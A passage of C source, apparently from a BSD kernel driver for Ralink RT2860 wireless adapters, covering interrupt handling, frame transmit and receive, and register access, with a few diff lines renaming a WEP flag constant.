= RAL_READ(sc, RT2860_TX_STAT_FIFO)) & RT2860_TXQ_VLD) { DPRINTFN(4, ("tx stat 0x%08x\n", stat)); wcid = (stat >> RT2860_TXQ_WCID_SHIFT) & 0xff; ni = sc->wcid2ni[wcid]; /* if no ACK was requested, no feedback is available */ if (!(stat & RT2860_TXQ_ACKREQ) || wcid == 0xff || ni == NULL) continue; /* update per-STA AMRR stats */ if (stat & RT2860_TXQ_OK) { /* * Check if there were retries, ie if the Tx success * rate is different from the requested rate. Note * that it works only because we do not allow rate * fallback from OFDM to CCK. */ mcs = (stat >> RT2860_TXQ_MCS_SHIFT) & 0x7f; pid = (stat >> RT2860_TXQ_PID_SHIFT) & 0xf; if (mcs + 1 != pid) retrycnt = 1; else retrycnt = 0; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); } else { ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; } } } static void rt2860_tx_intr(struct rt2860_softc *sc, int qid) { struct ifnet *ifp = sc->sc_ifp; struct rt2860_tx_ring *ring = &sc->txq[qid]; uint32_t hw; rt2860_drain_stats_fifo(sc); hw = RAL_READ(sc, RT2860_TX_DTX_IDX(qid)); while (ring->next != hw) { struct rt2860_tx_data *data = ring->data[ring->next]; if (data != NULL) { bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txwi_dmat, data->map); if (data->m->m_flags & M_TXCB) { ieee80211_process_callback(data->ni, data->m, 0); } m_freem(data->m); ieee80211_free_node(data->ni); data->m = NULL; data->ni = NULL; SLIST_INSERT_HEAD(&sc->data_pool, data, next); ring->data[ring->next] = NULL; ifp->if_opackets++; } ring->queued--; ring->next = (ring->next + 1) % RT2860_TX_RING_COUNT; } sc->sc_tx_timer = 0; if (ring->queued < RT2860_TX_RING_COUNT) sc->qfullmsk &= ~(1 << qid); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2860_start_locked(ifp); } /* * Return the Rx chain with the highest RSSI for a given frame. */ static __inline uint8_t rt2860_maxrssi_chain(struct rt2860_softc *sc, const struct rt2860_rxwi *rxwi) { uint8_t rxchain = 0; if (sc->nrxchains > 1) { if (rxwi->rssi[1] > rxwi->rssi[rxchain]) rxchain = 1; if (sc->nrxchains > 2) if (rxwi->rssi[2] > rxwi->rssi[rxchain]) rxchain = 2; } return rxchain; } static void rt2860_rx_intr(struct rt2860_softc *sc) { struct rt2860_rx_radiotap_header *tap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m, *m1; bus_addr_t physaddr; uint32_t hw; uint16_t phy; uint8_t ant; int8_t rssi, nf; int error; hw = RAL_READ(sc, RT2860_FS_DRX_IDX) & 0xfff; while (sc->rxq.cur != hw) { struct rt2860_rx_data *data = &sc->rxq.data[sc->rxq.cur]; struct rt2860_rxd *rxd = &sc->rxq.rxd[sc->rxq.cur]; struct rt2860_rxwi *rxwi; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); if (__predict_false(!(rxd->sdl0 & htole16(RT2860_RX_DDONE)))) { DPRINTF(("RXD DDONE bit not set!\n")); break; /* should not happen */ } if (__predict_false(rxd->flags & htole32(RT2860_RX_CRCERR | RT2860_RX_ICVERR))) { ifp->if_ierrors++; goto skip; } #ifdef HW_CRYPTO if (__predict_false(rxd->flags & htole32(RT2860_RX_MICERR))) { /* report MIC failures to net80211 for TKIP */ ic->ic_stats.is_rx_locmicfail++; ieee80211_michael_mic_failure(ic, 0/* XXX */); ifp->if_ierrors++; goto skip; } #endif m1 = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (__predict_false(m1 == NULL)) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(m1, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (__predict_false(error != 0)) { m_freem(m1); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2860_dma_map_addr, &physaddr, 0); if (__predict_false(error != 0)) { panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } /* physical address may have changed */ rxd->sdp0 = htole32(physaddr); ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = m1; rxd->sdp0 = htole32(physaddr); rxwi = mtod(m, struct rt2860_rxwi *); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_data = (caddr_t)(rxwi + 1); m->m_pkthdr.len = m->m_len = le16toh(rxwi->len) & 0xfff; wh = mtod(m, struct ieee80211_frame *); #ifdef HW_CRYPTO - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { /* frame is decrypted by hardware */ - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } #endif /* HW may insert 2 padding bytes after 802.11 header */ if (rxd->flags & htole32(RT2860_RX_L2PAD)) { u_int hdrlen = ieee80211_hdrsize(wh); ovbcopy(wh, (caddr_t)wh + 2, hdrlen); m->m_data += 2; wh = mtod(m, struct ieee80211_frame *); } ant = rt2860_maxrssi_chain(sc, rxwi); rssi = rt2860_rssi2dbm(sc, rxwi->rssi[ant], ant); nf = RT2860_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_antenna = ant; tap->wr_antsignal = nf + rssi; tap->wr_antnoise = nf; /* in case it can't be found below */ tap->wr_rate = 2; phy = le16toh(rxwi->phy); switch (phy & RT2860_PHY_MODE) { case RT2860_PHY_CCK: switch ((phy & RT2860_PHY_MCS) & ~RT2860_PHY_SHPRE) { case 0: tap->wr_rate = 2; break; case 1: tap->wr_rate = 4; break; case 2: tap->wr_rate = 11; break; case 3: tap->wr_rate = 22; break; } if (phy & RT2860_PHY_SHPRE) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; break; case RT2860_PHY_OFDM: switch (phy & RT2860_PHY_MCS) { case 0: tap->wr_rate = 12; break; case 1: tap->wr_rate = 18; break; case 2: tap->wr_rate = 24; break; case 3: tap->wr_rate = 36; break; case 4: tap->wr_rate = 48; break; case 5: tap->wr_rate = 72; break; case 6: tap->wr_rate = 96; break; case 7: tap->wr_rate = 108; break; } break; } } RAL_UNLOCK(sc); wh = mtod(m, struct ieee80211_frame *); /* send the frame to the 802.11 layer */ ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void)ieee80211_input(ni, m, rssi - nf, nf); ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi - nf, nf); RAL_LOCK(sc); skip: rxd->sdl0 &= ~htole16(RT2860_RX_DDONE); bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_PREWRITE); sc->rxq.cur = (sc->rxq.cur + 1) % RT2860_RX_RING_COUNT; } /* tell HW what we have processed */ RAL_WRITE(sc, RT2860_RX_CALC_IDX, (sc->rxq.cur - 1) % RT2860_RX_RING_COUNT); } static void rt2860_tbtt_intr(struct rt2860_softc *sc) { #if 0 struct ieee80211com *ic = &sc->sc_ic; #ifndef IEEE80211_STA_ONLY if (ic->ic_opmode == IEEE80211_M_HOSTAP) { /* one less beacon until next DTIM */ if (ic->ic_dtim_count == 0) ic->ic_dtim_count = ic->ic_dtim_period - 1; else ic->ic_dtim_count--; /* update dynamic parts of beacon */ rt2860_setup_beacon(sc); /* flush buffered multicast frames */ if (ic->ic_dtim_count == 0) ieee80211_notify_dtim(ic); } #endif /* check if protection mode has changed */ if ((sc->sc_ic_flags ^ ic->ic_flags) & IEEE80211_F_USEPROT) { rt2860_updateprot(ic); sc->sc_ic_flags = ic->ic_flags; } #endif } static void rt2860_gp_intr(struct rt2860_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTFN(2, ("GP timeout state=%d\n", vap->iv_state)); if (vap->iv_state == IEEE80211_S_RUN) rt2860_updatestats(sc); } void rt2860_intr(void *arg) { struct rt2860_softc *sc = arg; uint32_t r; RAL_LOCK(sc); r = RAL_READ(sc, RT2860_INT_STATUS); if (__predict_false(r == 0xffffffff)) { RAL_UNLOCK(sc); return; /* device likely went away */ } if (r == 0) { RAL_UNLOCK(sc); return; /* not for us */ } /* acknowledge interrupts */ RAL_WRITE(sc, RT2860_INT_STATUS, r); if (r & RT2860_TX_RX_COHERENT) rt2860_intr_coherent(sc); if (r & RT2860_MAC_INT_2) /* TX status */ rt2860_drain_stats_fifo(sc); if (r & RT2860_TX_DONE_INT5) rt2860_tx_intr(sc, 5); if (r & RT2860_RX_DONE_INT) rt2860_rx_intr(sc); if (r & RT2860_TX_DONE_INT4) rt2860_tx_intr(sc, 4); if (r & RT2860_TX_DONE_INT3) rt2860_tx_intr(sc, 3); if (r & RT2860_TX_DONE_INT2) rt2860_tx_intr(sc, 2); if (r & RT2860_TX_DONE_INT1) rt2860_tx_intr(sc, 1); if (r & RT2860_TX_DONE_INT0) rt2860_tx_intr(sc, 0); if (r & RT2860_MAC_INT_0) /* TBTT */ rt2860_tbtt_intr(sc); if (r & RT2860_MAC_INT_3) /* Auto wakeup */ /* TBD wakeup */; if (r & RT2860_MAC_INT_4) /* GP timer */ rt2860_gp_intr(sc); RAL_UNLOCK(sc); } static int rt2860_tx(struct rt2860_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct rt2860_tx_ring *ring; struct rt2860_tx_data *data; struct rt2860_txd *txd; struct rt2860_txwi *txwi; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *m1; bus_dma_segment_t segs[RT2860_MAX_SCATTER]; bus_dma_segment_t *seg; u_int hdrlen; uint16_t qos, dur; uint8_t type, qsel, mcs, pid, tid, qid; int i, nsegs, ntxds, pad, rate, ridx, error; /* the data pool contains at least one element, pick the first */ data = SLIST_FIRST(&sc->data_pool); wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { m_freem(m); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m, struct ieee80211_frame *); } hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } rate &= IEEE80211_RATE_VAL; qid = M_WME_GETAC(m); if (IEEE80211_QOS_HAS_SEQ(wh)) { qos = ((const struct ieee80211_qosframe *)wh)->i_qos[0]; tid = qos & IEEE80211_QOS_TID; } else { qos = 0; tid = 0; } ring = &sc->txq[qid]; ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate); /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; /* setup TX Wireless Information */ txwi = data->txwi; txwi->flags = 0; /* let HW generate seq numbers for non-QoS frames */ txwi->xflags = qos ? 0 : RT2860_TX_NSEQ; if (type == IEEE80211_FC0_TYPE_DATA) txwi->wcid = IEEE80211_AID(ni->ni_associd); else txwi->wcid = 0xff; txwi->len = htole16(m->m_pkthdr.len); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* * We store the MCS code into the driver-private PacketID field. * The PacketID is latched into TX_STAT_FIFO when Tx completes so * that we know at which initial rate the frame was transmitted. * We add 1 to the MCS code because setting the PacketID field to * 0 means that we don't want feedback in TX_STAT_FIFO. */ pid = (mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* check if RTS/CTS or CTS-to-self protection is required */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold || ((ic->ic_flags & IEEE80211_F_USEPROT) && rt2860_rates[ridx].phy == IEEE80211_T_OFDM))) txwi->txop = RT2860_TX_TXOP_HT; else txwi->txop = RT2860_TX_TXOP_BACKOFF; if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && (!qos || (qos & IEEE80211_QOS_ACKPOLICY) != IEEE80211_QOS_ACKPOLICY_NOACK)) { txwi->xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ridx].sp_ack_dur; else dur = rt2860_rates[ridx].lp_ack_dur; *(uint16_t *)wh->i_dur = htole16(dur); } /* ask MAC to insert timestamp into probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) /* NOTE: beacons do not pass through tx_data() */ txwi->flags |= RT2860_TX_TS; if (ieee80211_radiotap_active_vap(vap)) { struct rt2860_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (mcs & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } pad = (hdrlen + 3) & ~3; /* copy and trim 802.11 header */ memcpy(txwi + 1, wh, hdrlen); m_adj(m, hdrlen); error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0 && error != EFBIG)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } if (__predict_true(error == 0)) { /* determine how many TXDs are required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* not enough free TXDs, force mbuf defrag */ bus_dmamap_unload(sc->txwi_dmat, data->map); error = EFBIG; } } if (__predict_false(error != 0)) { m1 = m_defrag(m, M_NOWAIT); if (m1 == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } /* determine how many TXDs are now required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* this is a hopeless case, drop the mbuf! */ bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(m); return ENOBUFS; } } qsel = (qid < WME_NUM_AC) ? RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_MGMT; /* first segment is TXWI + 802.11 header */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(data->paddr); txd->sdl0 = htole16(sizeof (struct rt2860_txwi) + pad); txd->flags = qsel; /* setup payload segments */ seg = &segs[0]; for (i = nsegs; i >= 2; i -= 2) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len); seg++; ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; /* grab a new Tx descriptor */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(seg->ds_addr); txd->sdl0 = htole16(seg->ds_len); txd->flags = qsel; seg++; } /* finalize last segment */ if (i > 0) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len | RT2860_TX_LS1); } else { txd->sdl0 |= htole16(RT2860_TX_LS0); txd->sdl1 = 0; } /* remove from the free pool and link it into the SW Tx slot */ SLIST_REMOVE_HEAD(&sc->data_pool, next); data->m = m; data->ni = ni; ring->data[ring->cur] = data; bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(4, ("sending frame qid=%d wcid=%d nsegs=%d ridx=%d\n", qid, txwi->wcid, nsegs, ridx)); ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; ring->queued += ntxds; if (ring->queued >= RT2860_TX_RING_COUNT) sc->qfullmsk |= 1 << qid; /* kick Tx */ RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), ring->cur); return 0; } static int rt2860_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rt2860_softc *sc = ifp->if_softc; int error; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ error = rt2860_tx(sc, m, ni); } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ error = rt2860_tx_raw(sc, m, ni, params); } if (error != 0) { /* NB: m is reclaimed on tx failure */ ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_tx_timer = 5; RAL_UNLOCK(sc); return error; } static int rt2860_tx_raw(struct rt2860_softc *sc, struct mbuf *m, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct rt2860_tx_ring *ring; struct rt2860_tx_data *data; struct rt2860_txd *txd; struct rt2860_txwi *txwi; struct ieee80211_frame *wh; struct mbuf *m1; bus_dma_segment_t segs[RT2860_MAX_SCATTER]; bus_dma_segment_t *seg; u_int hdrlen; uint16_t dur; uint8_t type, qsel, mcs, pid, tid, qid; int i, nsegs, ntxds, pad, rate, ridx, error; /* the data pool contains at least one element, pick the first */ data = SLIST_FIRST(&sc->data_pool); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_hdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* Choose a TX rate index. */ rate = params->ibp_rate0; ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate & IEEE80211_RATE_VAL); if (ridx == (uint8_t)-1) { /* XXX fall back to mcast/mgmt rate? */ m_freem(m); return EINVAL; } qid = params->ibp_pri & 3; tid = 0; ring = &sc->txq[qid]; /* get MCS code from rate index */ mcs = rt2860_rates[ridx].mcs; /* setup TX Wireless Information */ txwi = data->txwi; txwi->flags = 0; /* let HW generate seq numbers for non-QoS frames */ txwi->xflags = params->ibp_pri & 3 ? 0 : RT2860_TX_NSEQ; txwi->wcid = 0xff; txwi->len = htole16(m->m_pkthdr.len); if (rt2860_rates[ridx].phy == IEEE80211_T_DS) { txwi->phy = htole16(RT2860_PHY_CCK); if (ridx != RT2860_RIDX_CCK1 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) mcs |= RT2860_PHY_SHPRE; } else txwi->phy = htole16(RT2860_PHY_OFDM); txwi->phy |= htole16(mcs); /* * We store the MCS code into the driver-private PacketID field. * The PacketID is latched into TX_STAT_FIFO when Tx completes so * that we know at which initial rate the frame was transmitted. * We add 1 to the MCS code because setting the PacketID field to * 0 means that we don't want feedback in TX_STAT_FIFO. */ pid = (mcs + 1) & 0xf; txwi->len |= htole16(pid << RT2860_TX_PID_SHIFT); /* check if RTS/CTS or CTS-to-self protection is required */ if (params->ibp_flags & IEEE80211_BPF_RTS || params->ibp_flags & IEEE80211_BPF_CTS) txwi->txop = RT2860_TX_TXOP_HT; else txwi->txop = RT2860_TX_TXOP_BACKOFF; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) { txwi->xflags |= RT2860_TX_ACK; if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) dur = rt2860_rates[ridx].sp_ack_dur; else dur = rt2860_rates[ridx].lp_ack_dur; *(uint16_t *)wh->i_dur = htole16(dur); } /* ask MAC to insert timestamp into probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) /* NOTE: beacons do not pass through tx_data() */ txwi->flags |= RT2860_TX_TS; if (ieee80211_radiotap_active_vap(vap)) { struct rt2860_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (mcs & RT2860_PHY_SHPRE) tap->wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; ieee80211_radiotap_tx(vap, m); } pad = (hdrlen + 3) & ~3; /* copy and trim 802.11 header */ memcpy(txwi + 1, wh, hdrlen); m_adj(m, hdrlen); error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0 && error != EFBIG)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } if (__predict_true(error == 0)) { /* determine how many TXDs are required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* not enough free TXDs, force mbuf defrag */ bus_dmamap_unload(sc->txwi_dmat, data->map); error = EFBIG; } } if (__predict_false(error != 0)) { m1 = m_defrag(m, M_NOWAIT); if (m1 == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m); return ENOBUFS; } m = m1; error = bus_dmamap_load_mbuf_sg(sc->txwi_dmat, data->map, m, segs, &nsegs, 0); if (__predict_false(error != 0)) { device_printf(sc->sc_dev, "can't map mbuf (error %d)\n", error); m_freem(m); return error; } /* determine how many TXDs are now required */ ntxds = 1 + (nsegs / 2); if (ring->queued + ntxds >= RT2860_TX_RING_COUNT) { /* this is a hopeless case, drop the mbuf! */ bus_dmamap_unload(sc->txwi_dmat, data->map); m_freem(m); return ENOBUFS; } } qsel = (qid < WME_NUM_AC) ? RT2860_TX_QSEL_EDCA : RT2860_TX_QSEL_MGMT; /* first segment is TXWI + 802.11 header */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(data->paddr); txd->sdl0 = htole16(sizeof (struct rt2860_txwi) + pad); txd->flags = qsel; /* setup payload segments */ seg = &segs[0]; for (i = nsegs; i >= 2; i -= 2) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len); seg++; ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; /* grab a new Tx descriptor */ txd = &ring->txd[ring->cur]; txd->sdp0 = htole32(seg->ds_addr); txd->sdl0 = htole16(seg->ds_len); txd->flags = qsel; seg++; } /* finalize last segment */ if (i > 0) { txd->sdp1 = htole32(seg->ds_addr); txd->sdl1 = htole16(seg->ds_len | RT2860_TX_LS1); } else { txd->sdl0 |= htole16(RT2860_TX_LS0); txd->sdl1 = 0; } /* remove from the free pool and link it into the SW Tx slot */ SLIST_REMOVE_HEAD(&sc->data_pool, next); data->m = m; data->ni = ni; ring->data[ring->cur] = data; bus_dmamap_sync(sc->txwi_dmat, sc->txwi_map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txwi_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(4, ("sending frame qid=%d wcid=%d nsegs=%d ridx=%d\n", qid, txwi->wcid, nsegs, ridx)); ring->cur = (ring->cur + 1) % RT2860_TX_RING_COUNT; ring->queued += ntxds; if (ring->queued >= RT2860_TX_RING_COUNT) sc->qfullmsk |= 1 << qid; /* kick Tx */ RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), ring->cur); return 0; } static void rt2860_start(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2860_start_locked(ifp); RAL_UNLOCK(sc); } static void rt2860_start_locked(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RAL_LOCK_ASSERT(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || (ifp->if_drv_flags & IFF_DRV_OACTIVE)) return; for (;;) { if (SLIST_EMPTY(&sc->data_pool) || sc->qfullmsk != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (rt2860_tx(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } } static void rt2860_watchdog(void *arg) { struct rt2860_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2860_stop_locked(sc); rt2860_init_locked(sc); ifp->if_oerrors++; return; } callout_reset(&sc->watchdog_ch, hz, rt2860_watchdog, sc); } static int rt2860_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { rt2860_init_locked(sc); startall = 1; } else rt2860_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2860_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCSIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } /* * Reading and writing from/to the BBP is different from RT2560 and RT2661. * We access the BBP through the 8051 microcontroller unit which means that * the microcode must be loaded first. */ void rt2860_mcu_bbp_write(struct rt2860_softc *sc, uint8_t reg, uint8_t val) { int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_BBPAGENT) & RT2860_BBP_CSR_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP through MCU\n"); return; } RAL_WRITE(sc, RT2860_H2M_BBPAGENT, RT2860_BBP_RW_PARALLEL | RT2860_BBP_CSR_KICK | reg << 8 | val); RAL_BARRIER_WRITE(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_BBP, 0, 0); DELAY(1000); } uint8_t rt2860_mcu_bbp_read(struct rt2860_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_H2M_BBPAGENT) & RT2860_BBP_CSR_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP through MCU\n"); return 0; } RAL_WRITE(sc, RT2860_H2M_BBPAGENT, RT2860_BBP_RW_PARALLEL | RT2860_BBP_CSR_KICK | RT2860_BBP_CSR_READ | reg << 8); RAL_BARRIER_WRITE(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_BBP, 0, 0); DELAY(1000); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2860_H2M_BBPAGENT); if (!(val & RT2860_BBP_CSR_KICK)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP through MCU\n"); return 0; } /* * Write to one of the 4 programmable 24-bit RF registers. */ static void rt2860_rf_write(struct rt2860_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_RF_CSR_CFG0) & RT2860_RF_REG_CTRL)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } /* RF registers are 24-bit on the RT2860 */ tmp = RT2860_RF_REG_CTRL | 24 << RT2860_RF_REG_WIDTH_SHIFT | (val & 0x3fffff) << 2 | (reg & 3); RAL_WRITE(sc, RT2860_RF_CSR_CFG0, tmp); } static uint8_t rt3090_rf_read(struct rt2860_softc *sc, uint8_t reg) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT3070_RF_CSR_CFG) & RT3070_RF_KICK)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read RF register\n"); return 0xff; } tmp = RT3070_RF_KICK | reg << 8; 